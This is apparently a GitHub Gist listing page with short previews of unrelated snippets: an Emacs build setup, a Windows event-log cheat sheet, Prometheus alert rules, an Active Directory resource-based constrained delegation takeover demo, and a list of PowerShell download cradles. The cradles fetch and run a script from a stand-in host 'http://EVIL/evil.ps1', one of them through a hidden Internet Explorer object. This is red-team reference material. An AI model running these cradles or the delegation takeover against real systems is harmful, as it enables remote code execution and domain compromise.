bloodstiller bloodstiller
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Setting up Emacs in our source directory | |
| mkdir -p ~/src && cd ~/src | |
| git clone --depth 1 --branch emacs-30 git://git.savannah.gnu.org/emacs.git | |
| git checkout emacs-30 | |
| # Enable development libraries and update apt cache | |
| # for Ubuntu >= 24.04 | |
| sudo sed -i 's/^Types: deb$/Types: deb deb-src/' /etc/apt/sources.list.d/ubuntu.sources && apt update |
githubfoam
/ windows event logs cheat sheet
Last active
November 23, 2025 12:55
windows event logs cheat sheet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| # PS : ChatGPT makes mistakes, consider "trust but verify" principle | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| #Events to Monitor | |
| https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/plan/appendix-l--events-to-monitor | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| #run | |
| eventvwr.msc Event viewer | |
| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | |
| Event Viewer(Local)-Windows Logs (shutdown / restart ) |
krisek
/ alert.rules.yml
Last active
December 5, 2025 12:33
Prometheus alert rules for node exporter
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| groups: | |
| - name: node_exporter_alerts | |
| rules: | |
| - alert: Node down | |
| expr: up{job="monitoring-pi"} == 0 | |
| for: 2m | |
| labels: | |
| severity: warning | |
| annotations: | |
| title: Node {{ $labels.instance }} is down |
HarmJ0y
/ rbcd_demo.ps1
Last active
November 3, 2025 20:14
Resource-based constrained delegation computer DACL takeover demo
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |